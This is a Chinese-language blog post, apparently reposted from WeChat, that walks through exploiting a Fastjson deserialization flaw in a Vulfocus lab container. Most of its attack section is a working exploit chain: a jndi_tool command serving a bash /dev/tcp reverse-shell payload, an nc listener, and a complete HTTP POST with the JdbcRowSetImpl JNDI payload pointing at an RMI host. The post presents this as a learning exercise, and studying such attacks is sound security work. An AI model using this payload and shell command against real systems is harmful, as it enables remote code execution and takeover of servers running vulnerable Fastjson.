Fastjson漏洞反弹Shell之巧妙利用
2022-7-15 00:14:59 Author: 哆啦安全(查看原文) 阅读量:146 收藏


网安引领时代,弥天点亮未来   

0x00写在前面
本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!
0x01背景介绍
Fastjson 是Alibaba的开源JSON解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化到 JavaBean。相信利用过Fastjson漏洞的XDM都知道,该漏洞利用需要编写Java利用代码,然后在编译为class文件,在通过rmi/ladp等远程加载实现漏洞利用。
0x02具体操作
1.通过使用Vulfocus docker环境部署该漏洞
 2.对响应数据做简单分析判断为json格式,然后使用yakit工具插件进行漏洞识别
漏洞识别
3.通过dnslog判断是否可以正常解析
4.漏洞存在,然后进行巧妙的利用,下载jndi_tool工具
https://github.com/wyzxxz/jndi_tool
本地需要安装java环境,启动工具,并输入vps地址
java -cp jndi_tool.jar jndi.EvilRMIServer 1099 8888 "bash -i >&/dev/tcp/10.211.55.7/12388 0>&1"
 nc监听端口
nc -lvvp 12388
发送payload获取反向shell
POST / HTTP/1.1Host: 10.211.55.2:59619Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Content-Length: 0Content-Type: application/jsonCookie: vue_admin_template_token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoxLCJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjoxNjU3NTM4NDk3LCJlbWFpbCI6IiJ9.w7B99Cl7zqST2Iatp0uAJoGRMZimQucf9bydS9l98voUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
{"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://10.211.55.7:1099/Object","autoCommit":true}}
查看监听端口,获取shell

推荐阅读

Web安全零基础速成培训班

Android APP开发零基础速成培训班

Android APP逆向分析零基础速成培训班

Android10系统定制之frida逆向分析速成培训班

零基础学编程/零基础学安全/零基础学逆向实战速成培训班


文章来源: http://mp.weixin.qq.com/s?__biz=Mzg2NzUzNzk1Mw==&mid=2247493089&idx=3&sn=a95220f40818522a719eaaf4990c6fb1&chksm=ceb8a0aff9cf29b9f64dce144f4927056031038311b677d4af1a09b7d33a67386f26a561b079#rd
如有侵权请联系:admin#unsafe.sh